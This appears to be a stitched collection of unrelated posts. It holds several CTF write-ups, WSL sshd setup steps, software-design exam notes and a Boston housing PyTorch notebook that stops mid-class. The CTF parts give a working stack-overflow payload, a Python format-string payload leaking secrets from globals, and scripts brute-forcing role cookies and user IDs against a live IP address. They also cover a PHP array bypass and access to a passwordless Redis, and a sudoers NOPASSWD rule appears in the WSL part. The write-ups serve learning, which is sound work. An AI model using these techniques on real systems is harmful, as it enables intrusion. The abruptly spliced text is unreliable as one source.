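This block is the branch that prints the flag on success.

Because PIE is enabled, addresses from static analysis cannot be used directly. Since ASLR is off, though, addresses from local dynamic debugging can be used as-is.

So the return target is 0x555555555193 (the PIE base 0x555555554000 plus 0x1193).

Continue single-stepping.

If we naively build the following payload:
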
offset = 0x78
payload = b'a' * offset + p64(0x555555555193)

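This does not print the flag, for two reasons:

  1. hex_to_binary asserts on its input: the length must be even, and every character must be a hex digit (the raw address bytes are not);
  2. the pointer that should be printed has also been overwritten with b'aaaaaaaa'.

Problem 1 first: make the first byte of the payload \0. strlen then returns 0, which passes the even-length check, and hex_to_binary converts nothing.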
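Below is a rough Python model of those two asserts, for checking a candidate payload before sending it. `c_strlen` and `hex_to_binary_ok` are hypothetical helpers that mirror the C source above. strlen stops at the first NUL, the length must be even, and char_to_repr accepts only hex digits.

```python
HEX_DIGITS = set(b"0123456789abcdefABCDEF")


def c_strlen(buf: bytes) -> int:
    """Length up to the first NUL byte, like C strlen()."""
    n = buf.find(b"\0")
    return len(buf) if n == -1 else n


def hex_to_binary_ok(buf: bytes) -> bool:
    """Would hex_to_binary(buf, buf, strlen(buf)) get past its asserts?"""
    length = c_strlen(buf)
    if length % 2:
        return False  # "length must be even"
    # char_to_repr asserts on anything that is not a hex digit
    return all(b in HEX_DIGITS for b in buf[:length])


naive = b"a" * 0x78 + (0x555555555193).to_bytes(8, "little")
print(hex_to_binary_ok(naive))                   # False: 0x93 is not a hex digit
print(hex_to_binary_ok(b"\0" + b"a" * 0x77))     # True: strlen is 0
```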

Now problem 2. Recall how check_user_hash ends:

00000000000014b7         pop        r12
00000000000014b9 ret

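Right before ret, the function pops the stack slot just below the return address into r12, and r12 is exactly what main passes to puts.

The dynamic debugging output confirms this:
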
10:0080│         0x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:0088│         0x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'

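The slot just before the return address holds the flag pointer.

So the payload must preserve this slot. Thanks again to ASLR being off, we need no leak to find the address: we can simply write the address seen while debugging locally into the payload.

The new payload looks roughly like this:
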
offset = 0x70  # saved r12 slot; the return address follows at 0x78
payload = b'\0' + b'a' * (offset - 1) + p64(0x7fffffffdd50) + p64(0x555555555193)

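Tried again: it still fails.

The reason is that gets automatically appends a \0 after the string it stores.

Unfortunately, the slot right after the return address is the stack buffer holding the flag string. That \0 overwrites the flag's first byte, so puts prints an empty string.

Fortunately, this is a 64-bit program, so the top bytes of the address are 0 anyway: 0x555555555193 occupies only 6 bytes, and the upper two bytes are 0x00. In little-endian order the most significant byte sits at the highest address, and the string is written from low to high addresses. So if we drop the last byte of the packed return address, the automatically appended \0 lands on that byte, which was 0x00 anyway.

Build the final payload:
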
offset = 0x70
payload = b'\0' + b'a' * (offset - 1) + p64(0x7fffffffdd50) + p64(0x555555555193)[:-1]
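Below is a sketch that assembles the final payload with only the standard library and checks the layout described above. The saved r12 slot gets the flag pointer, and the return address is truncated to 7 bytes. The NUL that gets() appends then lands on the address's top byte instead of on the flag. The sketch assumes the local addresses found earlier. `p64` is defined here with `struct` and behaves like pwntools' helper of the same name. gets() stops at a newline, so the sketch also checks that the payload contains no 0x0a byte.

```python
import struct


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian integer (same bytes as pwntools' p64)."""
    return struct.pack("<Q", value)


R12_OFFSET = 0x70            # saved r12 slot, relative to the gets() buffer
FLAG_PTR = 0x7FFFFFFFDD50    # local address of the flag buffer (ASLR off)
PUTS_FLAG = 0x555555555193   # loc_1193 in main: mov rdi, r12; call puts

payload = b"\0" + b"a" * (R12_OFFSET - 1) + p64(FLAG_PTR) + p64(PUTS_FLAG)[:-1]

# gets() stores the payload followed by one terminating NUL byte
written = payload + b"\0"
print(hex(len(payload)))                        # 0x7f
print(written[0x78:0x80] == p64(PUTS_FLAG))     # True: the NUL completes the address
print(b"\n" not in payload)                     # True: gets() would stop at 0x0a
```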

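However, this payload still doesn't get the flag from the server, because the server's libc differs from the local one.

That is a minor problem, though: add an offset to both addresses and brute-force it.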

  • hint: python format

wechat id for you is here

import html
import secrets

from flask import Flask, Response, request

from flag import FLAG, GIFT

app = Flask(__name__)


def read(filename, encoding='utf-8'):
    with open(filename, 'r', encoding=encoding) as fin:
        return fin.read()


@app.route('/', methods=['GET'])
def index():
    guess = request.args.get('guess')

    if not guess:
        return Response(read(__file__), mimetype='text/plain')

    if guess == secrets.token_hex(16):
        return 'Nice guess! Your flag is {}'.format(FLAG)
    elif guess == "giveup":
        return 'Give up is OK, sweet gift for you: {}'.format(GIFT)

    fs = ('Better luck next time!<br/>'
          'Your IP: {r.remote_addr}<br/>'
          'Your User Agent: {r.user_agent}<br/>'
          'Your Guess: ' + html.escape(guess))
    return fs.format(r=request)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=15000)
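The hint points at `str.format`. The user's guess is concatenated into `fs` before `.format(r=request)` is called. html.escape leaves `{`, `}`, `[`, `]`, `.` and `_` untouched, so any replacement field in the guess gets evaluated against `r`. Below is a self-contained sketch of the idea, assuming a stand-in `FakeRequest` class and a dummy `FLAG` (both hypothetical). The real target is Flask's request proxy, so the attribute chain that works against the live service may differ from the one shown here.

```python
import html

FLAG = "flag{not-the-real-one}"  # dummy secret living in this module's globals


class FakeRequest:
    """Hypothetical stand-in for flask.request. Defined in this module, so
    FakeRequest.__init__.__globals__ is this module's globals (where FLAG lives)."""

    def __init__(self):
        self.remote_addr = "127.0.0.1"


def render(guess: str) -> str:
    # Same pattern as the challenge: escaped input is concatenated into the
    # format string, and .format() only runs afterwards.
    fs = "Your Guess: " + html.escape(guess)
    return fs.format(r=FakeRequest())


print(render("{r.remote_addr}"))                           # Your Guess: 127.0.0.1
print(render("{r.__class__.__init__.__globals__[FLAG]}"))  # Your Guess: flag{not-the-real-one}
```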

Bilibili's Programmers' Day CTF

0x00

Numbering starts at 1... skipping.

0x01 & 0x02

Reviewing the page source shows:

<script>
    $.ajax({
        url: "api/admin",
        type: "get",
        success:function (data) {
            //console.log(data);
            if (data.code == 200){
                // if there is a value: front-end redirect
                var input = document.getElementById("flag1");
                input.value = String(data.data);
            } else {
                // if there is no value
                $('#flag1').html("接口异常,请稍后再试~");  // "API error, please try again later~"
            }
        }
    })
</script>
<script>
    $.ajax({
        url: "api/ctf/2",
        type: "get",
        success:function (data) {
            //console.log(data);
            if (data.code == 200){
                // if there is a value: front-end redirect
                $('#flag2').html("flag2: " + data.data);
            } else {
                // if there is no value
                $('#flag2').html("需要使用bilibili Security Browser浏览器访问~");  // "Please visit with the bilibili Security Browser~"
            }
        }
    })
</script>

First, visit http://45.113.201.36/api/admin to complete the check-in.

Then visit http://45.113.201.36/api/ctf/2, intercept the request, change the User-Agent header to bilibili Security Browser, and get the flag.

0x03

Look at the HTML:

<script>
    // flag 3

    $("#submit").click(function(){

        $.ajax({
            url: "api/ctf/3",
            type: "post",
            contentType: "application/json",
            dataType:"json",
            data: JSON.stringify({
                username: $("#name").val(),
                passwd: $("#subject").val(),
            }),
            success:function (data) {
                if (data.code == 200){
                    alert("flag is: " + data.data);
                } else {
                    alert("用户名或密码错误~");  // "Wrong username or password~"
                }
            }
        })
    });
</script>
Nothing looks wrong here, so try the most basic SQLi...

None of the injections I tried worked... gave up.

The answer turned out to be admin/bilibili.

0x04

Capturing the request shows:

GET /api/ctf/4 HTTP/1.1
Host: 45.113.201.36
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://45.113.201.36/superadmin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: session=eyJ1aWQiOiIyNjE4MjIifQ.X5Obkg.djkuPlz_wwtba7F-BHsM4lL7W54; role=ee11cbb19052e40b07aac0ca060c23ee
Connection: close

A quick search shows:

In [2]: md5("user".encode("utf8")).hexdigest()
Out[2]: 'ee11cbb19052e40b07aac0ca060c23ee'

Next, try the MD5 of various role names...

import requests
from hashlib import md5

def send_payload(payload):

    cookies = {
        'session': 'seeeeeeeeeeeeeeeession',
        # the server checks role = md5(role name)
        'role': md5(payload.encode("utf8")).hexdigest(),
    }

    headers = {
        'Proxy-Connection': 'keep-alive',
        'Accept': '*/*',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'http://45.113.201.36/superadmin.html',
        'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
    }

    response = requests.get('http://45.113.201.36/api/ctf/4', headers=headers, cookies=cookies, verify=False)

    return response

fuzz_list = [
    "admin",
    "superadmin",
    "SuperAdmin",
    "bilibili",
    "root",
    "管理员",  # "administrator"
    "超级管理员",  # "super administrator"
    "chaojiguanliyuan",
    "bilibiliadmin",
    "bilibilisuperadmin",
    "supervisor",
    "administrator",
    "superadministrator",
    "chenrui",
]

# also try the capitalized variants
fuzz_list.extend([s.capitalize() for s in fuzz_list])


for f in fuzz_list:
    r = send_payload(f)
    print(f"{f:>18}", r.text)

Result:

Administrator {"code":200,"data":"flag","msg":""}

Yay!

0x05

Code review time:

$(function () {


    (function ($) {
        $.getUrlParam = function(name) {
            var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
            var r = window.location.search.substr(1).match(reg);
            if (r != null) return unescape(r[2]); return null;
        }
    })(jQuery);

    var uid = $.getUrlParam('uid');
    if (uid == null) {
        uid = 100336889;
    }
    $.ajax({
        url: "api/ctf/5?uid=" + uid,
        type: "get",
        success:function (data) {
            console.log(data);
            if (data.code == 200){
                // if there is a value: front-end redirect
                $('#flag').html("欢迎超级管理员登陆~flag : " + data.data )  // "Welcome, super admin~"
            } else {
                // if there is no value
                $('#flag').html("这里没有你想要的答案~")  // "The answer you want isn't here~"
            }
        }
    })
});

The code doesn't reveal which uid is the target, so try brute-forcing it blind.

Slightly modify the earlier script:

import requests

def send_payload(payload):

    cookies = {
        'session': 'eyJ1aWQiOiIyNjE4MjIifQ.X5Obkg.djkuPlz_wwtba7F-BHsM4lL7W54',
    }

    headers = {
        'Proxy-Connection': 'keep-alive',
        'Accept': '*/*',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'http://45.113.201.36/superadmin.html',
        'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
    }

    response = requests.get('http://45.113.201.36/api/ctf/5?uid={}'.format(payload), headers=headers, cookies=cookies, verify=False)

    return response

# scan 10000 uids upward from the default uid in the page script
for f in range(100336889, 100336889 + 10000):
    r = send_payload(f)
    rj = r.json()
    if rj["data"]:
        print(f"{f:>5}", rj)

print("finish")

Then just wait for the results.

0x06

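There's nothing in the code worth reviewing...

The page is titled Black & White, and the only input that needs validation is the email field. My guess was that it might hide an XSS.

Build the payload

Build a payload? As if...
Scanning with 御剑 (Yujian, a directory scanner) turns up two pages: test.php and end.php.
Opening test.php gives something encoded with JSFuck; decoding it yields:
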
var str1 = "\u7a0b\u5e8f\u5458\u6700\u591a\u7684\u5730\u65b9";
var str2 = "bilibili1024havefun";
console.log()
"\u7a0b\u5e8f\u5458\u6700\u591a\u7684\u5730\u65b9"
"程序员最多的地方"

Now search GitHub for bilibili1024havefun to find the source of end.php:

<?php

//filename end.php

$bilibili = "bilibili1024havefun";

$str = intval($_GET['id']);
$reg = preg_match('/\d/is', $_GET['id']);

if(!is_numeric($_GET['id']) and $reg !== 1 and $str === 1){
    $content = file_get_contents($_GET['url']);

    // guess the file path
    if (false){
        echo "还差一点点啦~";  // "Almost there~"
    }else{
        echo $flag;
    }
}else{
    echo "你想要的不在这儿~";  // "What you want isn't here~"
}
?>

The id parameter must not be numeric and must not contain any digit, yet intval has to parse it as 1. From the PHP documentation on intval:

echo intval(array());                 // 0
echo intval(array('foo', 'bar')); // 1

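Try the payload id[]=1&id[]=2. A non-empty array is not numeric, preg_match cannot match an array (so $reg !== 1), and intval returns 1.

Next, guess the path: /api/ctf/6/flag.txt (don't ask how I guessed it; tricks from outside the game are part of CTF too).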

This yields the flag file bilibili_224a634752448def6c0ec064e49fe797_havefun.jpg

Opening it as a text file gives... {flag10:2ebd3b08-47ffc478-b49a5f9d-f6099d65}

That's the flag for challenge 10.

Mind blown.

0x07

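From challenge 7 onward you only get this hint, with no actual challenge:

You'll have to explore on your own, young one~

Oh.

Rumor has it that the answers to the last four challenges are all hidden in challenge 6. I was baffled.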

0x08

Port-scanning challenge 6's IP turns up a Redis instance. Connect, no password, flag 8, done.
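An unauthenticated Redis accepts commands straight away, usually on port 6379. On the wire, each command is sent as a RESP array of bulk strings. Below is a minimal Python sketch of that encoding. The `resp_command` helper is hypothetical, and actually sending the bytes over a socket (or simply using redis-cli) is left out.

```python
def resp_command(*args: str) -> bytes:
    """Encode a Redis command as a RESP array of bulk strings."""
    out = [f"*{len(args)}\r\n".encode()]          # array header: element count
    for arg in args:
        data = arg.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(data), data))  # bulk string: length + bytes
    return b"".join(out)


print(resp_command("KEYS", "*"))  # b'*2\r\n$4\r\nKEYS\r\n$1\r\n*\r\n'
```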

0x09

No idea what this one was.

0x10

Already stumbled upon it by accident in challenge 6.

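The best Linux distro is Windows 10!

The following applies only to Debian/Ubuntu.

Install and start sshd

First, make sure the openssh-server package is installed in the distro.
Unlike a regular distro, WSL does not use systemd to boot the system. War, war never changes.
So the SSH server has to be started through /etc/init.d/ssh.

Note that /etc/ssh/sshd_config needs editing. Setting Port to something above 1024 is recommended, and so is setting PasswordAuthentication to yes.

Test with /etc/init.d/ssh start; once it works, move on to the next step.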

Start sshd at boot

WSL doesn't start until the first command is run. So we write a start_sshd.vbs script and add it to Task Scheduler with an at-startup trigger.

The script:

Set wshell=wscript.createobject("wscript.shell")
wshell.run "C:\Windows\System32\wsl.exe sudo /etc/init.d/ssh start",0
Set wshell=Nothing

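However, sudo asks for a password. To bypass that, we need to edit the sudoers file.

sudo visudo

Add the following below the existing %sudo line, since in sudoers the last matching entry wins:
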
# for wsl start sshd
%sudo ALL=NOPASSWD: /etc/init.d/ssh start

and save it.

When done, be sure to reboot the system to test it.

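The full software engineering lifecycle and what each phase means

Requirements engineering: which methods exist for describing requirements

UML modeling: class, sequence, activity, deployment, and use case diagrams; explain clearly what each diagram is for

Given a class diagram, describe the relationships

Design patterns: what problem each solves, what the solution is, and what the consequences are

Object orientation: single interface; prefer composition and aggregation over inheritance

Interact with as few unfamiliar entities as possible (Law of Demeter)

High cohesion, low coupling: explain the principle

Open for extension, closed for modification

Given a class diagram, describe the design pattern

Singleton: thread safety, static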
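Below is a minimal thread-safe singleton in Python. It uses double-checked locking around a class-level (static) instance so that concurrent first calls still create exactly one object. `Config` is a hypothetical class name.

```python
import threading


class Config:
    """Singleton: every Config() call returns the same instance."""

    _instance = None               # the single shared (class-level) instance
    _lock = threading.Lock()       # guards first-time creation

    def __new__(cls):
        if cls._instance is None:              # fast path: no locking once created
            with cls._lock:
                if cls._instance is None:      # re-check while holding the lock
                    cls._instance = super().__new__(cls)
        return cls._instance


a, b = Config(), Config()
print(a is b)  # True
```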

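Composite, Observer, Factory, Abstract Factory, Agent (an autonomous software entity that perceives its environment, acts on its own, is social, can cooperate and negotiate, can self-organize, and can migrate)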
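Below is a minimal Observer sketch in Python, where observers are plain callables registered on a subject. The class and method names are illustrative.

```python
from typing import Callable


class Subject:
    """Observer pattern: observers register a callback and are notified on change."""

    def __init__(self) -> None:
        self._observers: list[Callable[[str], None]] = []

    def attach(self, observer: Callable[[str], None]) -> None:
        self._observers.append(observer)

    def detach(self, observer: Callable[[str], None]) -> None:
        self._observers.remove(observer)

    def notify(self, event: str) -> None:
        # iterate over a copy so observers may detach themselves while being notified
        for observer in list(self._observers):
            observer(event)


received = []
subject = Subject()
subject.attach(received.append)
subject.notify("state changed")
print(received)  # ['state changed']
```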

Introduction to SaaS; brief overview of edge computing

Regression on the Boston housing dataset with a neural network

Data file: boston housing

#Let's get rid of some imports
%matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
#Define the model
import torch
import torch.nn as nn
import torch.nn.functional as F

Workflow

  • Get the data
  • Analyze the data
  • Build the model
  • Evaluate the model
  • Save the model
  • Compare models

Getting the data

  • Use the provided boston_housing.txt file directly
  • Do not edit the txt file by hand

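from io import StringIO
import pandas as pd

def read_text():
    with open("boston_housing.txt") as f:
        r_list = [i.replace("\n", "") for i in f.readlines()]

    # description lines (0-based indices 7-20) and data lines (index 22 onward)
    des_part = r_list[7:21]
    data_part = r_list[22:]

    # column names: first token of each description line
    des_part = [s.split()[0].strip() for s in des_part]
    # each record is wrapped over two lines; join every pair back together
    data_part = [
        data_part[i] + data_part[i + 1] for i in range(0, len(data_part), 2)
    ]
    df = pd.read_csv(StringIO("\n".join(data_part)),
                     sep=r"\s+",  # raw string: avoids the invalid "\s" escape warning
                     header=None,
                     names=des_part)

    # print(df.head())
    return df

boston_df = read_text()
boston_df.head()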

CRIM ZN INDUS CHAS NOX RM AGE DIS RAD TAX PTRATIO B LSTAT MEDV
0 0.00632 18.0 2.31 0 0.538 6.575 65.2 4.0900 1 296.0 15.3 396.90 4.98 24.0
1 0.02731 0.0 7.07 0 0.469 6.421 78.9 4.9671 2 242.0 17.8 396.90 9.14 21.6
2 0.02729 0.0 7.07 0 0.469 7.185 61.1 4.9671 2 242.0 17.8 392.83 4.03 34.7
3 0.03237 0.0 2.18 0 0.458 6.998 45.8 6.0622 3 222.0 18.7 394.63 2.94 33.4
4 0.06905 0.0 2.18 0 0.458 7.147 54.2 6.0622 3 222.0 18.7 396.90 5.33 36.2

Attribute meanings:

CHAS and RAD should be treated as discrete variables.

- CRIM     per capita crime rate by town
- ZN       proportion of residential land zoned for lots over 25,000 sq.ft.
- INDUS    proportion of non-retail business acres per town
- CHAS     Charles River dummy variable (= 1 if tract bounds river; 0 otherwise)
- NOX      nitric oxides concentration (parts per 10 million)
- RM       average number of rooms per dwelling
- AGE      proportion of owner-occupied units built prior to 1940
- DIS      weighted distances to five Boston employment centres
- RAD      index of accessibility to radial highways
- TAX      full-value property-tax rate per 10,000
- PTRATIO  pupil-teacher ratio by town
- B        1000(Bk - 0.63)^2 where Bk is the proportion of blacks by town
- LSTAT    % lower status of the population
- MEDV     Median value of owner-occupied homes in $1000's

Next, check the features and quality of the data.

```python
boston_df.describe()
```

| | CRIM | ZN | INDUS | CHAS | NOX | RM | AGE | DIS | RAD | TAX | PTRATIO | B | LSTAT | MEDV |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| count | 506.000000 | 506.000000 | 506.000000 | 506.000000 | 506.000000 | 506.000000 | 506.000000 | 506.000000 | 506.000000 | 506.000000 | 506.000000 | 506.000000 | 506.000000 | 506.000000 |
| mean | 3.613524 | 11.363636 | 11.136779 | 0.069170 | 0.554695 | 6.284634 | 68.574901 | 3.795043 | 9.549407 | 408.237154 | 18.455534 | 356.674032 | 12.653063 | 22.532806 |
| std | 8.601545 | 23.322453 | 6.860353 | 0.253994 | 0.115878 | 0.702617 | 28.148861 | 2.105710 | 8.707259 | 168.537116 | 2.164946 | 91.294864 | 7.141062 | 9.197104 |
| min | 0.006320 | 0.000000 | 0.460000 | 0.000000 | 0.385000 | 3.561000 | 2.900000 | 1.129600 | 1.000000 | 187.000000 | 12.600000 | 0.320000 | 1.730000 | 5.000000 |
| 25% | 0.082045 | 0.000000 | 5.190000 | 0.000000 | 0.449000 | 5.885500 | 45.025000 | 2.100175 | 4.000000 | 279.000000 | 17.400000 | 375.377500 | 6.950000 | 17.025000 |
| 50% | 0.256510 | 0.000000 | 9.690000 | 0.000000 | 0.538000 | 6.208500 | 77.500000 | 3.207450 | 5.000000 | 330.000000 | 19.050000 | 391.440000 | 11.360000 | 21.200000 |
| 75% | 3.677082 | 12.500000 | 18.100000 | 0.000000 | 0.624000 | 6.623500 | 94.075000 | 5.188425 | 24.000000 | 666.000000 | 20.200000 | 396.225000 | 16.955000 | 25.000000 |
| max | 88.976200 | 100.000000 | 27.740000 | 1.000000 | 0.871000 | 8.780000 | 100.000000 | 12.126500 | 24.000000 | 711.000000 | 22.000000 | 396.900000 | 37.970000 | 50.000000 |
```python
# Check for missing values in every column
print(boston_df.isna().sum())
```

```
CRIM       0
ZN         0
INDUS      0
CHAS       0
NOX        0
RM         0
AGE        0
DIS        0
RAD        0
TAX        0
PTRATIO    0
B          0
LSTAT      0
MEDV       0
dtype: int64
```

Analyzing the data

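  • First, look at the dependent variable: for the most part it follows a normal distribution, though some values sit at the very top of the distribution; we will look into these later.
  • Then look at the correlation coefficients between the variables in the dataset.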
```python
# Let's use seaborn, because it is pretty. ;)
# See more here: http://seaborn.pydata.org/tutorial/distributions.html
import seaborn as sns
sns.displot(boston_df['MEDV']);
```



```python
corr = boston_df.corr()
corr.style.background_gradient(cmap='coolwarm')
```
| | CRIM | ZN | INDUS | CHAS | NOX | RM | AGE | DIS | RAD | TAX | PTRATIO | B | LSTAT | MEDV |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| CRIM | 1.000000 | -0.200469 | 0.406583 | -0.055892 | 0.420972 | -0.219247 | 0.352734 | -0.379670 | 0.625505 | 0.582764 | 0.289946 | -0.385064 | 0.455621 | -0.388305 |
| ZN | -0.200469 | 1.000000 | -0.533828 | -0.042697 | -0.516604 | 0.311991 | -0.569537 | 0.664408 | -0.311948 | -0.314563 | -0.391679 | 0.175520 | -0.412995 | 0.360445 |
| INDUS | 0.406583 | -0.533828 | 1.000000 | 0.062938 | 0.763651 | -0.391676 | 0.644779 | -0.708027 | 0.595129 | 0.720760 | 0.383248 | -0.356977 | 0.603800 | -0.483725 |
| CHAS | -0.055892 | -0.042697 | 0.062938 | 1.000000 | 0.091203 | 0.091251 | 0.086518 | -0.099176 | -0.007368 | -0.035587 | -0.121515 | 0.048788 | -0.053929 | 0.175260 |
| NOX | 0.420972 | -0.516604 | 0.763651 | 0.091203 | 1.000000 | -0.302188 | 0.731470 | -0.769230 | 0.611441 | 0.668023 | 0.188933 | -0.380051 | 0.590879 | -0.427321 |
| RM | -0.219247 | 0.311991 | -0.391676 | 0.091251 | -0.302188 | 1.000000 | -0.240265 | 0.205246 | -0.209847 | -0.292048 | -0.355501 | 0.128069 | -0.613808 | 0.695360 |
| AGE | 0.352734 | -0.569537 | 0.644779 | 0.086518 | 0.731470 | -0.240265 | 1.000000 | -0.747881 | 0.456022 | 0.506456 | 0.261515 | -0.273534 | 0.602339 | -0.376955 |
| DIS | -0.379670 | 0.664408 | -0.708027 | -0.099176 | -0.769230 | 0.205246 | -0.747881 | 1.000000 | -0.494588 | -0.534432 | -0.232471 | 0.291512 | -0.496996 | 0.249929 |
| RAD | 0.625505 | -0.311948 | 0.595129 | -0.007368 | 0.611441 | -0.209847 | 0.456022 | -0.494588 | 1.000000 | 0.910228 | 0.464741 | -0.444413 | 0.488676 | -0.381626 |
| TAX | 0.582764 | -0.314563 | 0.720760 | -0.035587 | 0.668023 | -0.292048 | 0.506456 | -0.534432 | 0.910228 | 1.000000 | 0.460853 | -0.441808 | 0.543993 | -0.468536 |
| PTRATIO | 0.289946 | -0.391679 | 0.383248 | -0.121515 | 0.188933 | -0.355501 | 0.261515 | -0.232471 | 0.464741 | 0.460853 | 1.000000 | -0.177383 | 0.374044 | -0.507787 |
| B | -0.385064 | 0.175520 | -0.356977 | 0.048788 | -0.380051 | 0.128069 | -0.273534 | 0.291512 | -0.444413 | -0.441808 | -0.177383 | 1.000000 | -0.366087 | 0.333461 |
| LSTAT | 0.455621 | -0.412995 | 0.603800 | -0.053929 | 0.590879 | -0.613808 | 0.602339 | -0.496996 | 0.488676 | 0.543993 | 0.374044 | -0.366087 | 1.000000 | -0.737663 |
| MEDV | -0.388305 | 0.360445 | -0.483725 | 0.175260 | -0.427321 | 0.695360 | -0.376955 | 0.249929 | -0.381626 | -0.468536 | -0.507787 | 0.333461 | -0.737663 | 1.000000 |
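The MEDV column of the correlation table is easier to read once the features are ranked by absolute correlation. This sketch hard-codes the MEDV row copied from the table above so that it runs on its own; with the notebook's data, `corr["MEDV"].drop("MEDV")` should give the same Series.

```python
import pandas as pd

# MEDV row of the correlation matrix above (copied values, not recomputed)
medv_corr = pd.Series({
    "CRIM": -0.388305, "ZN": 0.360445, "INDUS": -0.483725, "CHAS": 0.175260,
    "NOX": -0.427321, "RM": 0.695360, "AGE": -0.376955, "DIS": 0.249929,
    "RAD": -0.381626, "TAX": -0.468536, "PTRATIO": -0.507787, "B": 0.333461,
    "LSTAT": -0.737663,
})

# Order by |r| but keep the sign, since the sign tells the direction of the relationship
ranked = medv_corr.reindex(medv_corr.abs().sort_values(ascending=False).index)
print(ranked.head(3))  # LSTAT, RM, PTRATIO
```

LSTAT (negative) and RM (positive) stand out as the two features most strongly correlated with MEDV.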

Splitting the dataset

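  • By convention, y is the target variable and X (uppercase because it is a matrix) holds the independent variables.
  • Use train_test_split to split the data into a training set and a test set.
  • This divides the original dataset into four parts: X_train, X_test, y_train, y_test.
  • The split is drawn at random, and the random seed is fixed with random_state so the split can be reproduced.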
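The behavior described in the list can be checked on toy arrays. This is a minimal sketch with made-up data (not the Boston features): rows and labels are shuffled together, and the same random_state reproduces the same split.

```python
import numpy as np
from sklearn.model_selection import train_test_split

# Toy data: row i of X is [2i, 2i + 1] and its label is i
X = np.arange(20).reshape(10, 2)
y = np.arange(10)

split_a = train_test_split(X, y, test_size=0.3, random_state=0)
split_b = train_test_split(X, y, test_size=0.3, random_state=0)
X_train, X_test, y_train, y_test = split_a

print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)  # (7, 2) (3, 2) (7,) (3,)

# Every row still carries its own label after shuffling
print((X_train[:, 0] // 2 == y_train).all())  # True

# The same random_state gives exactly the same four arrays
same = all(np.array_equal(a, b) for a, b in zip(split_a, split_b))
print(same)  # True
```

With a float test_size, the test set gets ceil(test_size * n) rows, which is why 506 rows split into 354 training and 152 test rows in the output below.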
```python
def get_tag_columns(df, limit=10):
    '''Find columns with fewer than `limit` distinct values, i.e. discrete (categorical) columns.'''
    ret = []
    for col in df.columns:
        if df[col].nunique() < limit:
            ret.append(col)
    return ret
```
```python
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler


def preprocess(df):
    target_label = "MEDV"
    y = df[target_label].values
    df = df.drop(target_label, axis=1)

    # One-hot encode the discrete columns (CHAS and RAD with the default limit)
    tags = get_tag_columns(df)
    one_hot_df = pd.get_dummies(df[tags], columns=tags)

    # Standardize. Note: as written, StandardScaler is fit on the one-hot
    # columns, while the continuous columns are concatenated unscaled.
    ss = StandardScaler()
    X = np.concatenate([ss.fit_transform(one_hot_df), df.drop(tags, axis=1).values], axis=1)
    return X.astype("float32"), y.astype("float32")
```
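How the discrete-column rule and the one-hot step shape the feature matrix can be seen on a small made-up frame. The toy columns below are hypothetical; on the real data the same rule should pick CHAS (2 values) and RAD (9 values), so 11 one-hot columns plus the 11 remaining continuous columns give the 22 columns seen in the split output.

```python
import numpy as np
import pandas as pd


def get_tag_columns(df, limit=10):
    """Columns with fewer than `limit` distinct values are treated as discrete."""
    return [col for col in df.columns if df[col].nunique() < limit]


# Hypothetical toy frame: two discrete columns and one continuous column
toy = pd.DataFrame({
    "CHAS": [0, 1] * 6,                # 2 distinct values
    "RAD": [1, 2, 24] * 4,             # 3 distinct values
    "RM": np.linspace(5.0, 8.0, 12),   # 12 distinct values
})

tags = get_tag_columns(toy)
one_hot = pd.get_dummies(toy[tags], columns=tags)
print(tags)                   # ['CHAS', 'RAD']
print(list(one_hot.columns))  # ['CHAS_0', 'CHAS_1', 'RAD_1', 'RAD_2', 'RAD_24']

# One-hot block first, then the continuous columns, as in preprocess()
X = np.concatenate([one_hot.values, toy.drop(tags, axis=1).values], axis=1)
print(X.shape)  # (12, 6)
```

Each discrete column expands into one indicator column per distinct value, so the width of X depends on how many values each tagged column takes.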
```python
# sklearn.cross_validation was removed in scikit-learn 0.20, so this old import now fails:
# from sklearn.cross_validation import train_test_split
from sklearn.model_selection import train_test_split

# Earlier version without preprocessing: y is the dependent variable, and
# iloc slices by position to get the matrix of independent variables.
# y = boston_df['MEDV'].values
# X = boston_df.iloc[:, 0:-1].values

X, y = preprocess(boston_df)

# Split the data into a training set and a test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)

print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)
```

```
(354, 22) (152, 22) (354,) (152,)
```

Modeling

  • Next, set some hyperparameters for training
  • and define the structure of the neural network
```python
# Define training hyperparameters.
batch_size = 50
test_batch_size = 50
num_epochs = 500
learning_rate = 0.01
size_hidden = 100

# Calculate some other hyperparameters based on the data.
batch_no = len(X_train) // batch_size  # number of full batches
cols = X_train.shape[1]  # number of columns in the input matrix
n_output = 1
```
```python
# Create the model
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# On a CUDA machine this prints a CUDA device. Note that the model and tensors
# below are never moved with .to(device), so training actually runs on the CPU.
print("Executing the model on :", device)


class Net(torch.nn.Module):
    def __init__(self, n_feature, size_hidden, n_output):
        super(Net, self).__init__()
        self.hidden = torch.nn.Linear(n_feature, size_hidden)  # hidden layer
        self.predict = torch.nn.Linear(size_hidden, n_output)  # output layer

    def forward(self, x):
